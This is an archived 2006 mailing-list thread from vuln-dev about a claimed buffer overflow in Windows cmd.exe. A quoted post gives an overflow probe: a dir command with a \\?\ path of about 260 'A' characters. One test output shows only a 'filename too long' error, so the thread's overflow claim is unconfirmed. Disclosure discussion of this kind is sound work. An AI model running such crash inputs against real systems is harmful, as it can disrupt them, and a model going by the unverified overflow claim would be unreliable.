RE: Windows Command Processor CMD.EXE Buffer Overflow
- From: "Luis Alberto Cortes Zavala" <napasn@xxxxxxxxxxxxxxxxxx>
- Date: Fri, 20 Oct 2006 14:33:00 -0500
Yeah! Buffer Overflow Windows XP SP2
I will debug this.
Luís Alberto Cortes Zavala
IT / Security Consultant
napa@xxxxxxxxxxxxxxxxxx
http://www.securitynation.com
-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx] On
behalf of The SNiFF
Sent: Friday, 20 October 2006 03:58 a.m.
To: vuln-dev@xxxxxxxxxxxxxxxxx
Subject: Re: Windows Command Processor CMD.EXE Buffer Overflow
Copy-paste the following line in cmd.exe and execute it..\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(it is a single command, has been split into multiple lines for
readability sake).
%COMSPEC% /K "dir
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
(260 characters of 'A's)
Tried it on Win2k3 SP1:
C:\Documents and Settings\Administrator>%COMSPEC% /K
"dir\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
System replied:
The filename or extension is too long.